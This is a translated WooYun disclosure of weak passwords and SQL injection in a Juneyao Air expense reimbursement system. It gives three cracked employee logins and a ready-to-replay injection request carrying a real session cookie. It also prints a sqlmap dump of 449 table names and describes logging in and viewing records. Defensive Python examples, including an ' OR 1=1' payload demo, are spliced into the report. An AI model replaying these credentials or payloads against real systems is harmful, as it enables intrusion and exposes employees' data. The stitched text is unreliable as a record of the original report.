Vulnerability summary

Defect ID: wooyun-2015-0139595

Title: Weak passwords and SQL injection on a Juneyao Air site, a collection (12 databases and 449 tables involved)

Vendor: juneyaoair.com

Author: Xmyth_夏洛克

Submitted: 2015-09-07 20:54

Fixed: 2015-10-23 15:44

Published: 2015-10-23 15:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-07: Details sent to the vendor; awaiting vendor action
2015-09-08: Vendor confirmed; details disclosed to the vendor only
2015-09-18: Details disclosed to core white hats and domain experts
2015-09-28: Details disclosed to regular white hats
2015-10-08: Details disclosed to intern white hats
2015-10-23: Details disclosed to the public

Brief description:

23333333

Detailed description:

URL:
Back-end login page of the expense reimbursement system
http://expense.juneyaoair.com:8080/Frame/login.aspx

[Screenshot: login page]


Ran a dictionary attack;
three accounts were cracked:

[Screenshot: three accounts]


zhanghong/123456
zhangjun/123456
liulei/123456
Logged into the system

[Screenshot: expense reimbursement system]


Reimbursement records can be viewed

[Screenshot: reimbursement form]
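The dictionary attack above worked because nothing throttled or alerted on repeated login attempts. As an added example (not part of the original report), the following Python script flags a source IP that posts to the login page more than a set number of times inside a sliding window. The log line format, the 60-second window and the threshold of 10 are assumptions, and the log lines are constructed; only the login path comes from the report.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

LOGIN_PATH = "/Frame/login.aspx"   # login page named in the report
WINDOW_SECONDS = 60                 # assumed detection window
THRESHOLD = 10                      # assumed: login POSTs per IP per window that trigger an alert

# Assumed, simplified access-log shape: ip [dd/Mon/yyyy:HH:MM:SS zone] "METHOD path HTTP/x" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one normal user, then 12 login POSTs from one address in 24 seconds.
SAMPLE_LOG = [
    '198.51.100.5 [07/Sep/2015:20:09:58 +0800] "GET /Frame/login.aspx HTTP/1.1" 200',
    '198.51.100.5 [07/Sep/2015:20:10:05 +0800] "POST /Frame/login.aspx HTTP/1.1" 302',
] + [
    f'203.0.113.7 [07/Sep/2015:20:10:{s:02d} +0800] "POST /Frame/login.aspx HTTP/1.1" 200'
    for s in range(10, 34, 2)
] + [
    '203.0.113.7 [07/Sep/2015:20:12:00 +0800] "GET /publicpage/PubOpenListPage.aspx?key=410402 HTTP/1.1" 200',
]


def parse_line(line):
    """Split one access-log line into (ip, timestamp, method, path without query, status)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FORMAT)
    path = m.group("path").split("?")[0]
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect_login_bursts(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {ip: peak_count} for every IP whose login POSTs reach `threshold`
    inside any `window`-second span. Lines must be in time order; a per-IP deque
    holds only the timestamps still inside the window, so memory stays bounded."""
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        # Only login submissions count; GETs of the form and other pages are ignored.
        if method != "POST" or path.lower() != LOGIN_PATH.lower():
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


if __name__ == "__main__":
    for ip, count in detect_login_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {count} login POSTs within {WINDOW_SECONDS}s")
```

On the constructed log only 203.0.113.7 is reported, with a peak of 12 attempts; the normal user's single POST never reaches the threshold. Status codes are parsed but deliberately not used, because an ASP.NET forms login commonly answers a failed attempt with a 200 page rather than a 401, so request rate to the login path is the more reliable signal.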


Proof of vulnerability:

The search on the "send message" page is injectable:

[Screenshot: 8,420 employee accounts]


POST /publicpage/PubOpenListPage.aspx?ac=getdata&UserSqlPar=&q=%20AND%20text%20LIKE%20%27%27%25123%25%27%27%20%20&key=410402&u=3268 HTTP/1.1
Host: expense.juneyaoair.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://expense.juneyaoair.com:8080/publicPage/PubOpenListPage.aspx?key=410402&SourceWhere=&IsSingle=0&IsGetStr=1&rand=1441625347394
Content-Length: 45
Cookie: ASP.NET_SessionId=cxycaq55bf3db1550s5awdjk; ERCookie=iUserID=3268&cUserCode=zhanghong&cUserName=%e5%bc%a0%e7%ba%a2&cCredit=0.00&DepartmentName=%e8%88%aa%e6%9d%90%e7%ae%a1%e7%90%86%e5%a4%84&DepartmentID=36&DepartmentCode=010502&CompanyIDList=&CompanyCodeList=&RoleIDList=2%2c266&RoleCodeList=002%2c266&LanguageID=1&s=G3a0FvOSXESM/+tGAwidzZ4KVf3NqYb6&Title=&currentCompId=1&CompanyIDList2=1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pageIndex=0&pageSize=10&sortField=&sortOrder=


The q parameter is injectable.
Running sqlmap shows 12 databases involved.
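The request above shows the underlying design flaw: the q parameter carries a raw SQL fragment (" AND text LIKE '%123%'") that the server appends to its WHERE clause, so the client controls query syntax rather than data. As an added example (not the application's code), the Python block below reproduces that pattern against an in-memory SQLite table and puts the fixed version beside it: the client sends a search term, the server binds it as a parameter and escapes LIKE wildcards. The table name, schema and rows are constructed for illustration and are not the real EXPENSE database.

```python
import sqlite3

# Constructed table and rows for illustration only (not the real EXPENSE schema).
ROWS = [
    (1, "expense claim 123 approved", 3268),
    (2, "lunch receipt missing", 3268),
    (3, "salary adjustment 123, confidential", 999),
]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, text TEXT, owner_id INTEGER)")
    conn.executemany("INSERT INTO messages VALUES (?, ?, ?)", ROWS)
    return conn


def search_vulnerable(conn, user_id, q):
    """Same design as the reported endpoint: `q` is a raw SQL fragment pasted onto
    the WHERE clause. The client can therefore cancel the owner filter entirely."""
    sql = f"SELECT id, text FROM messages WHERE owner_id = {int(user_id)} {q}"
    return conn.execute(sql).fetchall()


def search_hardened(conn, user_id, term):
    """Fixed form: the client sends a search term, never SQL. The term is bound as a
    parameter (data to the driver, not syntax) and LIKE wildcards in it are escaped,
    so a user cannot widen the match with a bare % or _ either."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    pattern = f"%{escaped}%"
    sql = "SELECT id, text FROM messages WHERE owner_id = ? AND text LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (int(user_id), pattern)).fetchall()


def demo():
    conn = setup_db()
    return {
        # intended use: user 3268 searches their own messages for "123"
        "vuln_normal": search_vulnerable(conn, 3268, " AND text LIKE '%123%'"),
        # a fragment that neutralises the owner filter leaks another user's row
        "vuln_injected": search_vulnerable(conn, 3268, " OR 1=1"),
        # hardened: same search, same single result
        "safe_normal": search_hardened(conn, 3268, "123"),
        # hardened: the former payload is now just text and matches nothing
        "safe_injected": search_hardened(conn, 3268, " OR 1=1"),
        # hardened: a bare wildcard is escaped and matches only a literal percent sign
        "safe_wildcard": search_hardened(conn, 3268, "%"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14s} -> {rows}")
```

The point of the fix is not filtering the fragment but removing the fragment interface altogether: once the server owns the whole query text and the client supplies only a bound value, the database driver never has to decide whether a request is data or syntax. The same change applies to UserSqlPar, which the request shows as a second fragment-carrying parameter.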

[Screenshot: 12 databases]


The current database has more than 400 tables:

Database: EXPENSE
[449 tables]
+--------------------------------+
| AFR_AbNormalDetail_CZ |
| AFR_AbNormalDetail_SK |
| AFR_AbNormalDetail_Sum |
| AFR_AbNormalMain |
| AFR_AbNormaldetail_bak |
| AFR_AbNormaldetail_bak |
| AFR_CusDetail_CW |
| AFR_CusDetail_CW |
| AFR_CusDetail_CZ |
| AFR_CusDetail_FK |
| AFR_CusDetail_SK |
| AFR_CusMain |
| AFR_FixedDetail_CW |
| AFR_FixedDetail_CW |
| AFR_FixedDetail_CZ |
| AFR_FixedDetail_FK |
| AFR_FixedDetail_SK |
| AFR_FixedMain |
| AFR_MarketingDetail_CW |
| AFR_MarketingDetail_CW |
| AFR_MarketingDetail_CZ |
| AFR_MarketingDetail_FK |
| AFR_MarketingDetail_SK |
| AFR_MarketingMain |
| AFR_NormalDetail_CW |
| AFR_NormalDetail_CW |
| AFR_NormalDetail_CZ |
| AFR_NormalDetail_FK |
| AFR_NormalDetail_SK |
| AFR_NormalDetail_Sum |
| AFR_NormalMain |
| AFR_OfficeDetail_CW |
| AFR_OfficeDetail_CW |
| AFR_OfficeDetail_CZ |
| AFR_OfficeDetail_FK |
| AFR_OfficeDetail_SK |
| AFR_OfficeMain |
| AFR_ProjectDetail_CW |
| AFR_ProjectDetail_CW |
| AFR_ProjectDetail_CZ |
| AFR_ProjectDetail_FK |
| AFR_ProjectDetail_SK |
| AFR_ProjectDetail_Sum |
| AFR_ProjectMain |
| AFR_PublicNormalDetail_CZ |
| AFR_PublicNormalDetail_CZ |
| AFR_PublicNormalDetail_SK |
| AFR_PublicNormalMain |
| AFR_PurDetail_CW |
| AFR_PurDetail_CW |
| AFR_PurDetail_CZ |
| AFR_PurDetail_FK |
| AFR_PurDetail_SK |
| AFR_PurMain |
| AFR_ServeDetail_CW |
| AFR_ServeDetail_CW |
| AFR_ServeDetail_CZ |
| AFR_ServeDetail_SK |
| AFR_ServeDetail_Sum |
| AFR_ServeMain |
| AFR_TravelDetail_BZ |
| AFR_TravelDetail_BZ |
| AFR_TravelDetail_CW |
| AFR_TravelDetail_CZ |
| AFR_TravelDetail_FK |
| AFR_TravelDetail_SK |
| AFR_TravelDetail_Sum |
| AFR_TravelDetail_ZS |
| AFR_TravelDetail_dy |
| AFR_TravelMain |
| AFR_VehicleDetail_CW |
| AFR_VehicleDetail_CW |
| AFR_VehicleDetail_CZ |
| AFR_VehicleDetail_FK |
| AFR_VehicleDetail_SK |
| AFR_VehicleMain |
| BorrowDetail_SK |
| BorrowDetail_SK |
| BorrowMain |
| Borrow_BackDetail |
| Borrow_BackMain |
| Borrow_BackOffLineDetail |
| Borrow_BackOffLineMain |
| Borrow_V_Info |
| Brrow_Report_Where |
| BudAdjustDetail |
| BudAdjustMain |
| BudConfig |
| BudPeriod |
| BudPeriodType |
| BudPeriodYear |
| BudPlanChangeLog |
| BudPlanMain_Test |
| BudPlanMain_Test |
| BudPlan_Test |
| BudPlan_Test |
| BudSolutionMap |
| BudSolutionMap |
| Bud_Bill_SqlField |
| Bud_Bill_SqlField |
| Bud_DeptMergeDetail |
| Bud_DeptMergeMain |
| Bud_MappingColumn |
| Bud_MappingDetail |
| Bud_MappingMain |
| Bud_Script |
| Bud_SpecialApproveDetail_CZ |
| Bud_SpecialApproveDetail_CZ |
| Bud_SpecialApproveMain |
| Bud_StyleType_Bill |
| Bud_StyleType_Bill |
| Bud_StyleType_WDL |
| Bud_StyleType_WDL |
| Bud_Style_Cell_Solu |
| Bud_Style_Cell_Solu |
| Bud_Style_Cell_Solu |
| Bud_Style_File |
| Bud_Style_Navigation |
| Bud_Style_Period |
| Bud_Style_User |
| Bud_Style_WDGroupDetail |
| Bud_Style_WDGroupDetail |
| Bud_Style_WDMap |
| Bud_Style_WD_CJ |
| Bud_V_Plan |
| Bud_WDL |
| Bud_WDL |
| EB_Area |
| EB_BankFileConfig |
| EB_BankFileConfig |
| EB_CashTable |
| EB_Code |
| EB_CostType |
| EB_Currency |
| EB_CusContactAdd |
| EB_CusContactAdd |
| EB_Customer |
| EB_CustomerType |
| EB_DateDay |
| EB_DateMonth |
| EB_DateYear |
| EB_Document |
| EB_FileUploadLog |
| EB_IndustryType |
| EB_InfoMain |
| EB_InfoMain |
| EB_ItemAgreeMentDetail_CZ |
| EB_ItemAgreeMentDetail_CZ |
| EB_ItemAgreeMentDetail_CZ |
| EB_ItemAgreeMentMain |
| EB_ItemStartDetail |
| EB_ItemStartMain |
| EB_Job |
| EB_PaymentType |
| EB_PrinterList |
| EB_RateAdjustLog |
| EB_ReimbStandard |
| EB_SZXM |
| EB_SZ_KM |
| EB_SubsidyStandard |
| EB_SuppContact |
| EB_Supplier |
| EB_SupplierType |
| EB_TravelBT |
| EB_TravelCW |
| EB_TravelZSBZ |
| FAGL_CashTable |
| Fa_CollectionCheckDetail |
| Fa_CollectionCheckMain |
| Fa_CollectionDetail |
| Fa_CollectionMain |
| Fa_GLBooks |
| Fa_GLCodeConfigDetail |
| Fa_GLCodeConfigMain |
| Fa_GLCodeMapMain |
| Fa_GLCodeMapMain |
| Fa_GLDataSource |
| Fa_GLDsign |
| Fa_GLExcelImport |
| Fa_GLKisVoucherError |
| Fa_GLKisVoucherError |
| Fa_GLMainSql |
| Fa_GLRPCompayS |
| Fa_GLRPDetail_Back |
| Fa_GLRPDetail_Back |
| Fa_GLRPMain_Back |
| Fa_GLRPMain_Back |
| Fa_GLServers |
| Fa_GLUFaccvouchError |
| Fa_GLUFaccvouchError |
| Fa_GLVoucherTemplate |
| Fa_GetPricePolicy |
| Fa_OtherPayDetail_CZ |
| Fa_OtherPayDetail_CZ |
| Fa_OtherPayMain |
| Fa_PayMoneyDetail_CZ |
| Fa_PayMoneyDetail_CZ |
| Fa_PayMoneyDetail_SK |
| Fa_PayMoneyMain |
| Fa_PaymentCheckDetail |
| Fa_PaymentCheckMain |
| Fa_PaymentDetail |
| Fa_PaymentMain |
| Fa_Test |
| Fa_V_FKDetail |
| Fa_VoucherTmpToGL |
| OA_ItemDocumentMain |
| OA_Overtime |
| OA_RenovateMain |
| OA_ServiceList |
| OA_TravelRequest |
| OA_VacationMain2 |
| OA_VacationMain2 |
| Per_AddedMenu |
| Project_Doc |
| Project_Mediate |
| Project_StartDetail_His |
| Project_StartDetail_His |
| Project_StartMain |
| Project_Step |
| Project_TaskPlanDetail |
| Project_TaskPlanMain |
| Project_TelnetServiceRecord |
| Project_VS_Doc |
| Report_V_BaseApport |
| Report_V_CW |
| Report_V_Req |
| Report_V_RetApprove |
| Report_V_SR |
| Report_V_bxx |
| Report_V_travel |
| Report_V_wb_item |
| Req_CusDetail_JK |
| Req_CusDetail_JK |
| Req_CusMain |
| Req_FixedDetail_JK |
| Req_FixedDetail_JK |
| Req_FixedMain |
| Req_MarketingDetail_JK |
| Req_MarketingDetail_JK |
| Req_MarketingMain |
| Req_NormalDetail_JK |
| Req_NormalDetail_JK |
| Req_NormalMain |
| Req_OfficeDetail_JK |
| Req_OfficeDetail_JK |
| Req_OfficeMain |
| Req_ProjectDetail_JK |
| Req_ProjectDetail_JK |
| Req_ProjectMain |
| Req_PurDetail |
| Req_PurMain |
| Req_ServeDetail |
| Req_ServeMain |
| Req_TravelDetail_JK |
| Req_TravelDetail_JK |
| Req_TravelDetail_ZS |
| Req_TravelMain |
| Req_VehicleDetail_JK |
| Req_VehicleDetail_JK |
| Req_VehicleMain |
| SSP_Book |
| SSP_FYType |
| SSP_UploadData |
| SSP_UploadFile |
| SSP_User |
| Sa_SRDetail |
| Sa_SRMain |
| Sys_Alert |
| Sys_AlertVSRole |
| Sys_ApproveAllowButton |
| Sys_ApproveBillApproveLog |
| Sys_ApproveCheckItemBeforePass |
| Sys_ApproveFlowList |
| Sys_ApproveMailSend |
| Sys_ApproveSubAccess |
| Sys_ApproveSubCondition |
| Sys_ApproveSubitem |
| Sys_ApproveWaiteApproveList |
| Sys_ApproveedAllowEditCols |
| Sys_BDCheck |
| Sys_BillHelperMsg |
| Sys_BillHelperMsgVsBill |
| Sys_BillHelperMsgVsRole |
| Sys_BillPrintList |
| Sys_BillVSReport |
| Sys_Company |
| Sys_Config |
| Sys_CopyDetail |
| Sys_CopyMain |
| Sys_Credit |
| Sys_CreditVSobject |
| Sys_CtrCompetenceAccess |
| Sys_CtrCompetenceDetail |
| Sys_CtrCompetenceMain |
| Sys_CtrJsCompetenceAccess |
| Sys_CtrJsCompetenceCondition |
| Sys_CtrJsCompetenceDetail |
| Sys_DataCheckItem |
| Sys_DataCheckVsToolBar |
| Sys_DataCompetenceAccess |
| Sys_DataCompetenceBaseVsBill |
| Sys_DataCompetenceCondition |
| Sys_DataCompetenceDetail |
| Sys_DefineColConfig |
| Sys_Dept |
| Sys_DeskPanel |
| Sys_DeskPanelVSRole |
| Sys_Dic |
| Sys_ExchangeRate |
| Sys_FeedBack |
| Sys_Fn |
| Sys_GridDetail |
| Sys_GridMain |
| Sys_ImportDetail |
| Sys_ImportMain |
| Sys_ImportValidItem |
| Sys_InfoMain |
| Sys_InfoMain |
| Sys_LanguageDetail |
| Sys_LanguageDetail |
| Sys_LogForBDError |
| Sys_LogForBud |
| Sys_LogForGL |
| Sys_LogForSaveBackUp |
| Sys_LogForSaveBackUp |
| Sys_LogForSqlEvent |
| Sys_LogForWF |
| Sys_Log_11 |
| Sys_Log_11 |
| Sys_Log_12 |
| Sys_Log_13 |
| Sys_Log_14 |
| Sys_MaxBillID |
| Sys_Menu |
| Sys_Message |
| Sys_MessageSendAccount |
| Sys_MessageSendLog |
| Sys_MessageSendMode |
| Sys_MessageSetting |
| Sys_MessageTask |
| Sys_MessageType |
| Sys_MessageVSReciver |
| Sys_Num |
| Sys_PageDetail |
| Sys_PageMain |
| Sys_ProgramList |
| Sys_PubPageForList |
| Sys_QFieldHideVSUid |
| Sys_QTemplateDetail |
| Sys_QTemplateDetail |
| Sys_QTemplateMain |
| Sys_QueryPageDetail |
| Sys_QueryPageMain |
| Sys_Resource |
| Sys_ResourceType |
| Sys_Role |
| Sys_RoleVSAction |
| Sys_RoleVSSolution |
| Sys_RoleVsBillColumn |
| Sys_RoleVsCompany |
| Sys_SQLFromColNameMatch |
| Sys_SQLFromPartDetail |
| Sys_SQLFromPartMain |
| Sys_SQLFromPartType |
| Sys_SQLWhereDetail |
| Sys_SQLWhereType |
| Sys_SSOConfig |
| Sys_SecondActionSql |
| Sys_SecondProcessAccess |
| Sys_SysNoRules |
| Sys_ToolBarList |
| Sys_ToolBarVSBill |
| Sys_UserVSDept |
| Sys_UserVSJob |
| Sys_UserVSRole |
| Sys_UserVsBillColumn |
| Sys_V_AllBillStatus |
| Sys_V_ApproveList |
| Sys_V_Area |
| Sys_V_Code |
| Sys_V_CostType |
| Sys_V_CtrCompetence |
| Sys_V_Dept_VS_User |
| Sys_V_Dept_VS_User |
| Sys_V_ItemDocument |
| Sys_V_ItemDocument |
| Sys_V_ItemStart |
| Sys_V_Job |
| Sys_V_Menu |
| Sys_V_PaymentList |
| Sys_V_Period |
| Sys_V_RoleVSUser |
| Sys_V_Role_VS_User |
| Sys_V_SZXM |
| Sys_V_TravelFor_RP |
| Sys_V_TravelUnionAll |
| Sys_V_UserInfo |
| Sys_V_UserRoleDept |
| Sys_V_WFStepAccess |
| Sys_WFAllowEditColsBackUp |
| Sys_WFAllowEditColsBackUp |
| Sys_WFAppOpinion |
| Sys_WFApproveLog |
| Sys_WFBillVSFlow |
| Sys_WFCheckList |
| Sys_WFConsign |
| Sys_WFDic |
| Sys_WFEventList |
| Sys_WFFlowType |
| Sys_WFFlowVSCheck |
| Sys_WFFlowVSEvent |
| Sys_WFMailCCUser |
| Sys_WFMailTempVSFlow |
| Sys_WFMailTemplateDetail |
| Sys_WFMailTemplateDetail |
| Sys_WFMonitorLog |
| Sys_WFStepAccessDynamic |
| Sys_WFStepAccessDynamic |
| Sys_WFStepAccessDynamic |
| Sys_WFStepDynamic |
| Sys_WFStepRelation |
| Sys_WFTransferApp |
| Sys_WFWaiteApprove |
| Sys_WFWebPageDetail |
| Sys_WFWebPageMain |
| Sys_Website |
| Test_List |
| Test_SetBillCount |
| Tran_CenterError |
| Tran_EB_Code |
| Tran_NC_ARAP_DJFB |
| Tran_NC_ARAP_DJZB |
| Tran_Sys_Dept |
| Tran_Sys_Role |
| Tran_Sys_User |
| V_AFR_TravelDetail |
| Z_JiShuLevel |
| aaa |
| aaa |
| bbb |
| nc |
| sys_MessageReciverType |
| sys_PageDataSourceSql |
| sys_user_bak |
| sys_user_bak |
| tmp_user |
| u_tmp |
| 期初借款 |
+--------------------------------+


The records of more than 8,000 employees, including account passwords, should all be in there; I won't go further to prove it.

Fix recommendation:

That's a lot of data, and I did not dump the database; asking for 20 Rank!!!

Copyright notice: when reposting, please credit Xmyth_夏洛克@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed at: 2015-09-08 15:43

Vendor reply:

Vulnerability confirmed

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-09-07 21:11 | 牛 小 帅 ( Regular white hat | Rank: 433, vulnerabilities: 100 | What bullshit love, life's already a mess! In a person's lifetime, ...)

    Been chewing Stride gum, have you? Just can't stop.

  2. 2015-09-07 21:11 | 牛 小 帅 ( Regular white hat | Rank: 433, vulnerabilities: 100 | What bullshit love, life's already a mess! In a person's lifetime, ...)

  3. 2015-09-07 21:12 | Xmyth_夏洛克 ( Regular white hat | Rank: 940, vulnerabilities: 111 | I can't do anything)

    @牛 小 帅 Just can't stop at all